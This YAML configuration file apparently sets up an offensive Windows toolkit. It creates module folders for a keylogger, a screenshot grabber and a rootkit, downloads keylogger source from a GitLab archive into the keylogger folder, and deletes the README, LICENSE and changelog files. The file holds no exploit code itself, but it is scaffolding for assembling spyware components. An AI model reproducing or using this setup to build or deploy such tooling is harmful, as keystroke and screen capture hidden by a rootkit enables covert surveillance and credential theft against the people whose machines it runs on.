---
# Python modules to import
python_modules_needed:
  - requests

# Module Directories
module_directories:
  - modules

# Module Subirectories
module_directories_subfolders:
  - windows
  - windows/anagenesis
  - windows/aytogenesis
  - windows/paragenesis
  - windows/anagenesis/anacrypsis
  - windows/anagenesis/katascopos
  - windows/anagenesis/ypnokratos
  - windows/anagenesis/katascopos/keylogger
  - windows/anagenesis/katascopos/screenshoter
  - windows/anagenesis/ypnokratos/rootkit

# Download repositories
download_repositories:
  - name: windows_api
    path: windows/anagenesis/katascopos/keylogger
    url: https://gitlab.com/PhantomGhosts/Windows_api-Keylogger/repository/archive.tar.gz?ref=master

# File to delete
file_to_delete:
  - README.md
  - LICENSE
  - CHANGELOG.md
...
